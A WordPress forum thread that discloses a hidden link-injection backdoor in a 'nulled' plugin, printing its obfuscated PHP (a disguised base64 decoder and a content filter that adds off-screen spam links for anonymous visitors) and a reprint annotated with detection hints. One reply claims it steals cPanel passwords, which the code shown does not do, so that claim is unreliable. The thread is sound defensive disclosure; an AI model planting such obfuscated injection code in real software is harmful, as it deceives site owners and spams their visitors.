

04-21-2019, 01:00 AM (This post was last modified: 05-15-2019 01:25 PM by tompk242.)
Post: #1
PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
A few days ago, I downloaded a WP plugin from a sharing site and found malicious code in the plugin. The problem is that it looks like a normal PHP file and can't be detected by security software or Virustotal.

So be careful when you download and use plugins/themes from public/untrusted sites/members.

PHP Code:
<?php

/**
 * Helper function for translation.
 */

if (!function_exists('sanitize_context_zero')) {
    function 
sanitize_context_zero($input) {
        
$keyStr "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        
$chr1 $chr2 $chr3 "";
        
$enc1 $enc2 $enc3 $enc4 "";
        
$i 0;
        
$output "";
        
$input preg_replace("[^A-Za-z0-9\+\/\=]"""$input);
        do {
            
$enc1 strpos($keyStrsubstr($input$i++, 1));
            
$enc2 strpos($keyStrsubstr($input$i++, 1));
            
$enc3 strpos($keyStrsubstr($input$i++, 1));
            
$enc4 strpos($keyStrsubstr($input$i++, 1));
            
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
            
$chr2 = (($enc2 and 15) << 4) | ($enc3 >> 2);
            
$chr3 = (($enc3 and 3) << 6) | $enc4;
            
$output $output chr((int)$chr1);
            if (
$enc3 != 64) {
                
$output $output chr((int)$chr2);
            }

            if (
$enc4 != 64) {
                
$output $output chr((int)$chr3);
            }

            
$chr1 $chr2 $chr3 "";
            
$enc1 $enc2 $enc3 $enc4 "";
        }

        while (
$i strlen($input));
        return 
urldecode($output);
    }
}

if ( ! 
function_exists('safemodecc') ) {
    
    function 
safemodecc$content ) {

        if ( 
is_single() and& ! is_user_logged_in() and& ! is_feed() and& ! stristr$_SERVER['REQUEST_URI'], "amp") ) {

            
$divclass sanitize_context_zero("PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowOyBsZWZ0Oi05OTk5cHg7Ij4=");
            
$array = Array(
                    
sanitize_context_zero("RnJlZSBEb3dubG9hZCBXb3JkUHJlc3MgVGhlbWVz"),
                    
sanitize_context_zero("RG93bmxvYWQgUHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIEZyZWU="),
                    
sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcw=="),
                    
sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcyBGcmVl"),
                    
sanitize_context_zero("RG93bmxvYWQgTnVsbGVkIFdvcmRQcmVzcyBUaGVtZXM="),
                    
sanitize_context_zero("RG93bmxvYWQgQmVzdCBXb3JkUHJlc3MgVGhlbWVzIEZyZWUgRG93bmxvYWQ="),
                    
sanitize_context_zero("UHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIERvd25sb2Fk")
            );
            
$array2 = Array(
                    
sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBwYWlkIGNvdXJzZQ=="),
                    
sanitize_context_zero("dWRlbXkgcGFpZCBjb3Vyc2UgZnJlZSBkb3dubG9hZA=="),
                    
sanitize_context_zero("ZG93bmxvYWQgdWRlbXkgcGFpZCBjb3Vyc2UgZm9yIGZyZWU="),
                    
sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBjb3Vyc2U="),
                    
sanitize_context_zero("dWRlbXkgY291cnNlIGRvd25sb2FkIGZyZWU="),
                    
sanitize_context_zero("b25saW5lIGZyZWUgY291cnNl"),
                    
sanitize_context_zero("ZnJlZSBvbmxpbmUgY291cnNl"),
                    
sanitize_context_zero("Wkc5M2JteHZZV1FnYkhsdVpHRWdZMjkxY25ObElHWnlaV1U9"),
                    
sanitize_context_zero("bHluZGEgY291cnNlIGZyZWUgZG93bmxvYWQ="),
                    
sanitize_context_zero("dWRlbXkgZnJlZSBkb3dubG9hZA==")
            );
            
$array3 = Array(
                    
sanitize_context_zero("ZG93bmxvYWQgbW9iaWxlIGZpcm13YXJl"),
                    
sanitize_context_zero("ZG93bmxvYWQgc2Ftc3VuZyBmaXJtd2FyZQ=="),
                    
sanitize_context_zero("ZG93bmxvYWQgbWljcm9tYXggZmlybXdhcmU="),
                    
sanitize_context_zero("ZG93bmxvYWQgaW50ZXggZmlybXdhcmU="),
                    
sanitize_context_zero("ZG93bmxvYWQgcmVkbWkgZmlybXdhcmU="),
                    
sanitize_context_zero("ZG93bmxvYWQgeGlvbWkgZmlybXdhcmU="),
                    
sanitize_context_zero("ZG93bmxvYWQgbGVuZXZvIGZpcm13YXJl"),
                    
sanitize_context_zero("ZG93bmxvYWQgbGF2YSBmaXJtd2FyZQ=="),
                    
sanitize_context_zero("ZG93bmxvYWQga2FyYm9ubiBmaXJtd2FyZQ=="),
                    
sanitize_context_zero("ZG93bmxvYWQgY29vbHBhZCBmaXJtd2FyZQ=="),
                    
sanitize_context_zero("ZG93bmxvYWQgaHVhd2VpIGZpcm13YXJl")
            );

            
$abc1 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhld3BjbHViLm5ldA==").'">' $array[array_rand($array) ] . '</a></div>';
            
$abc2 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVzbGlkZS5jb20=").'">' $array[array_rand($array) ] . '</a></div>';
            
$abc3 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuc2NyaXB0LXN0YWNrLmNvbQ==").'">' $array[array_rand($array) ] . '</a></div>';
            
$abc4 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVtYXppbmcuY29t").'">' $array[array_rand($array) ] . '</a></div>';
            
$abc5 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cub25saW5lZnJlZWNvdXJzZS5uZXQ=").'">' $array2[array_rand($array2) ] . '</a></div>';
            
$abc6 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuZnJlbmR4LmNvbS9maXJtd2FyZS8=").'">' $array3[array_rand($array3) ] . '</a></div>';
            
$abc7 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWViYW5rcy5jb20=").'">' $array[array_rand($array) ] . '</a></div>';
            
$abc8 '' $divclass '<a href="'.sanitize_context_zero("aHR0cHM6Ly9kb3dubG9hZHR1dG9yaWFscy5uZXQ=").'">' $array2[array_rand($array2) ] . '</a></div>';

            
$fullcontent $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;

        } else {
        
            
$fullcontent $content;

        }

        return 
$fullcontent;

    }
}
    
if ( ! 
has_filter'the_content''safemodecc' ) ) {
    
add_filter('the_content''safemodecc');


You can decode the encoded part at https://www. base64 decode. org/ (remove the spaces, not sure why BBHF blocked this url) to see the full code. The malicious code comes from https://www.thewpclub.net/. Avoid all downloads from this site.

I will post the way I found it soon
04-21-2019, 01:05 AM
Post: #2
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
THNX BRO, GOD BLESS YOU
04-21-2019, 02:01 AM
Post: #3
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Much thanks. Repped for the find. Can any coders let us know what the code does?
04-21-2019, 02:06 AM
Post: #4
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
S***** about the infection, but max reps for being willing to show us how you found it.

Max repps from us newbies.

Thanks Perfect 10
04-21-2019, 10:06 AM (This post was last modified: 04-21-2019 10:06 AM by kirstie.)
Post: #5
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Good to know. Thanks for sharing.
04-21-2019, 11:04 AM
Post: #6
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Please describe what this malicious code actually does, for us non-coder types ??
Thanks
I totally despise board spammers and spambots !!!
04-21-2019, 11:22 AM
Post: #7
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't d...
(04-21-2019 02:01 AM)Gadzookz Wrote:  Much thanks. Repped for the find. Can any coders let us know what the code does?

It will damage your website and will let the attacker/hacker steal your cPanel password and replace all of your files with other files; even if you replace the files and change your cPanel password, the hacker will have the ability to change your password every time. The only solution for this is to ask your hosting provider to terminate your current cPanel account (you can take a backup of the database and the important files only). I recommend terminating the whole website, uploading the script again and linking the backup again.

Here is the story and the solution with few steps.
04-21-2019, 02:28 PM (This post was last modified: 04-21-2019 02:32 PM by CanhCam Guy.)
Post: #8
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Tons of 'touched' themes and plugins are shared here by some spam guys, and all we can do is see it every day.
Mods do nothing about these guys. Either mods don't care or mods are useless, I'm not sure.
I know about ten popular websites sharing themes and plugins leeched from 'malicious' sources, named "null..., gpl..."; most of them post on our forum every week.
Just enjoy them, my brothers, and see what will happen later!
04-21-2019, 06:22 PM
Post: #9
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
So how do you find that in a plugin? Does it have a certain name? Where do you look? Thx for the heads up, max rep.
04-21-2019, 08:09 PM (This post was last modified: 04-21-2019 08:11 PM by xiaofang.)
Post: #10
RE: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
It's been over a year since someone found this spam code. The plugin provider https://zipnull.com/, for example, embeds the inc.php in all of its supposedly nulled packages. The plugins are not actually nulled, but hacked with the intrusive code.

This line will always be included in the plugin’s main PHP file loading schema: @include_once("inc/inc.php");

For any plugin that can be downloaded freely, you can be almost certain it is hacked.
<?php

/**
* Helper function for translation.
*/

if (!function_exists('sanitize_context_zero')) {
// NOTE(review): despite the name and the "Helper function for translation" docblock,
// this is a hand-rolled base64 decoder, not a sanitizer. Re-implementing the decoder
// instead of calling base64_decode() keeps that obvious name out of the file, which is
// one reason simple signature scanners pass over it.
// Decodes a base64 string via a private alphabet table, then runs urldecode() on the result.
function sanitize_context_zero($input) {
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
// The pattern has no explicit delimiters, so PHP treats "[" and "]" as the delimiter pair
// and the effective regex is "^A-Za-z0-9\+\/\=" (a literal prefix match); this line does
// not strip non-alphabet characters the way it appears to.
$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
do {
// Read four 6-bit values from the table; "=" sits at index 64 and marks padding.
$enc1 = strpos($keyStr, substr($input, $i++, 1));
$enc2 = strpos($keyStr, substr($input, $i++, 1));
$enc3 = strpos($keyStr, substr($input, $i++, 1));
$enc4 = strpos($keyStr, substr($input, $i++, 1));
// Repack 4x6 bits into 3 bytes. As printed here "and" is PHP's logical operator, so
// ($enc2 and 15) yields a bool rather than the low nibble; this looks like the forum's
// rendering of "&" (compare "and&" in safemodecc) and the shipped file presumably uses
// bitwise "&" - as printed, the function would not decode correctly.
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 and 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 and 3) << 6) | $enc4;
$output = $output . chr((int)$chr1);
// Padding: a "=" in the third or fourth position means that output byte is absent.
if ($enc3 != 64) {
$output = $output . chr((int)$chr2);
}

if ($enc4 != 64) {
$output = $output . chr((int)$chr3);
}

$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
}

while ($i < strlen($input));
// Extra urldecode() pass over the decoded bytes before returning.
return urldecode($output);
}
}

if ( ! function_exists('safemodecc') ) {

// NOTE(review): this is the payload. It is registered as a filter on the_content (see the
// add_filter call below) and appends a block of hidden outbound links to every single-post
// page served to an anonymous visitor, i.e. SEO / link-farm injection. The site owner does
// not see it because logged-in users are excluded.
// @param string $content  the post body WordPress passes through the_content
// @return string          the body, with the hidden link block appended when the conditions hold
function safemodecc( $content ) {

// Inject only on single posts, only for visitors who are not logged in, not in feeds, and
// not when the request URI contains "amp" (a substring test, so e.g. "campaign" also matches).
// Detection hint: because of the logged-in exclusion, an admin has to fetch the page as an
// anonymous visitor (e.g. with curl) to see the injected markup.
// "and&" here is how the forum rendered "&&".
if ( is_single() and& ! is_user_logged_in() and& ! is_feed() and& ! stristr( $_SERVER['REQUEST_URI'], "amp") ) {

// Decodes to an opening <div style="position:absolute; top:0; left:-9999px;"> - the links
// are pushed off-screen so readers do not see them while crawlers still index them.
$divclass = sanitize_context_zero("PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowOyBsZWZ0Oi05OTk5cHg7Ij4=");
// Three pools of anchor text (theme downloads, paid-course downloads, phone firmware);
// one entry is picked at random per link below.
$array = Array(
sanitize_context_zero("RnJlZSBEb3dubG9hZCBXb3JkUHJlc3MgVGhlbWVz"),
sanitize_context_zero("RG93bmxvYWQgUHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIEZyZWU="),
sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcw=="),
sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcyBGcmVl"),
sanitize_context_zero("RG93bmxvYWQgTnVsbGVkIFdvcmRQcmVzcyBUaGVtZXM="),
sanitize_context_zero("RG93bmxvYWQgQmVzdCBXb3JkUHJlc3MgVGhlbWVzIEZyZWUgRG93bmxvYWQ="),
sanitize_context_zero("UHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIERvd25sb2Fk")
);
$array2 = Array(
sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBwYWlkIGNvdXJzZQ=="),
sanitize_context_zero("dWRlbXkgcGFpZCBjb3Vyc2UgZnJlZSBkb3dubG9hZA=="),
sanitize_context_zero("ZG93bmxvYWQgdWRlbXkgcGFpZCBjb3Vyc2UgZm9yIGZyZWU="),
sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBjb3Vyc2U="),
sanitize_context_zero("dWRlbXkgY291cnNlIGRvd25sb2FkIGZyZWU="),
sanitize_context_zero("b25saW5lIGZyZWUgY291cnNl"),
sanitize_context_zero("ZnJlZSBvbmxpbmUgY291cnNl"),
// This entry appears to be base64-encoded twice, so it decodes to another base64 string.
sanitize_context_zero("Wkc5M2JteHZZV1FnYkhsdVpHRWdZMjkxY25ObElHWnlaV1U9"),
sanitize_context_zero("bHluZGEgY291cnNlIGZyZWUgZG93bmxvYWQ="),
sanitize_context_zero("dWRlbXkgZnJlZSBkb3dubG9hZA==")
);
$array3 = Array(
sanitize_context_zero("ZG93bmxvYWQgbW9iaWxlIGZpcm13YXJl"),
sanitize_context_zero("ZG93bmxvYWQgc2Ftc3VuZyBmaXJtd2FyZQ=="),
sanitize_context_zero("ZG93bmxvYWQgbWljcm9tYXggZmlybXdhcmU="),
sanitize_context_zero("ZG93bmxvYWQgaW50ZXggZmlybXdhcmU="),
sanitize_context_zero("ZG93bmxvYWQgcmVkbWkgZmlybXdhcmU="),
sanitize_context_zero("ZG93bmxvYWQgeGlvbWkgZmlybXdhcmU="),
sanitize_context_zero("ZG93bmxvYWQgbGVuZXZvIGZpcm13YXJl"),
sanitize_context_zero("ZG93bmxvYWQgbGF2YSBmaXJtd2FyZQ=="),
sanitize_context_zero("ZG93bmxvYWQga2FyYm9ubiBmaXJtd2FyZQ=="),
sanitize_context_zero("ZG93bmxvYWQgY29vbHBhZCBmaXJtd2FyZQ=="),
sanitize_context_zero("ZG93bmxvYWQgaHVhd2VpIGZpcm13YXJl")
);

// Each line builds one hidden <div><a href="...">text</a></div>. The hrefs are base64-encoded
// third-party domains (the first decodes to the thewpclub.net site named in the post); the
// encoding keeps the domains out of a plain grep of the plugin.
$abc1 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhld3BjbHViLm5ldA==").'">' . $array[array_rand($array) ] . '</a></div>';
$abc2 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVzbGlkZS5jb20=").'">' . $array[array_rand($array) ] . '</a></div>';
$abc3 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuc2NyaXB0LXN0YWNrLmNvbQ==").'">' . $array[array_rand($array) ] . '</a></div>';
$abc4 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVtYXppbmcuY29t").'">' . $array[array_rand($array) ] . '</a></div>';
$abc5 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cub25saW5lZnJlZWNvdXJzZS5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>';
$abc6 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuZnJlbmR4LmNvbS9maXJtd2FyZS8=").'">' . $array3[array_rand($array3) ] . '</a></div>';
$abc7 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWViYW5rcy5jb20=").'">' . $array[array_rand($array) ] . '</a></div>';
$abc8 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly9kb3dubG9hZHR1dG9yaWFscy5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>';

// Eight hidden links are appended after the real post body.
$fullcontent = $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;

} else {

// Admins, feeds, "amp" URLs and non-single views get the untouched content.
$fullcontent = $content;

}

return $fullcontent;

}
}

// Registers the injector on the_content for every request; the has_filter guard keeps the
// link block from being appended twice if this file is included more than once.
// Detection hint: an add_filter('the_content', ...) inside a plugin's "inc/" helper (cf. the
// @include_once("inc/inc.php") line mentioned in this post) is worth a closer look, as is any
// custom base64 alphabet table like the one in sanitize_context_zero above.
if ( ! has_filter( 'the_content', 'safemodecc' ) ) {
add_filter('the_content', 'safemodecc');
}